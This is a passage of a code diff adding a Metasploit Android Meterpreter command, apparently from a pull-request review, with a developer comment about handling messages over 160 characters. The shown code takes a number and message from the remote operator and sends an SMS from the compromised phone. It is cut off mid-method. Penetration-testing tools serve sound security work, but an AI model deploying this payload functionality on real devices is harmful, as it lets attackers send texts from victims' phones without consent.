java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java

```diff
@@ -0,0 +1,109 @@
+package com.metasploit.meterpreter.android;
+
+import android.telephony.SmsManager;
+
+import android.app.PendingIntent;
+import android.content.BroadcastReceiver;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.app.Activity;
+import android.content.Context;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+
+public class send_sms_android implements Command {
+
+    private static final int TLV_EXTENSIONS = 20000;
+    private static final int TLV_TYPE_SMS_ADDRESS = TLVPacket.TLV_META_TYPE_STRING
+            | (TLV_EXTENSIONS + 9001);
+    private static final int TLV_TYPE_SMS_BODY = TLVPacket.TLV_META_TYPE_STRING
+            | (TLV_EXTENSIONS + 9002);
+    private static final int TLV_TYPE_SMS_SENT = TLVPacket.TLV_META_TYPE_BOOL
+            | (TLV_EXTENSIONS + 9021);
+
+    private static final String address = "address";
+    private static final String body = "body";
+
+
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request,
+                       TLVPacket response) throws Exception {
+
+	String number = request.getStringValue(TLV_TYPE_SMS_ADDRESS);
+	String message = request.getStringValue(TLV_TYPE_SMS_BODY);
+	SmsManager sm = SmsManager.getDefault();
+	if (message.length() > 160) {
```

Comment:
What I should consider is actually implementing the procedure for >160 chars, duh. my bad, sorry, I'll push a fix for this.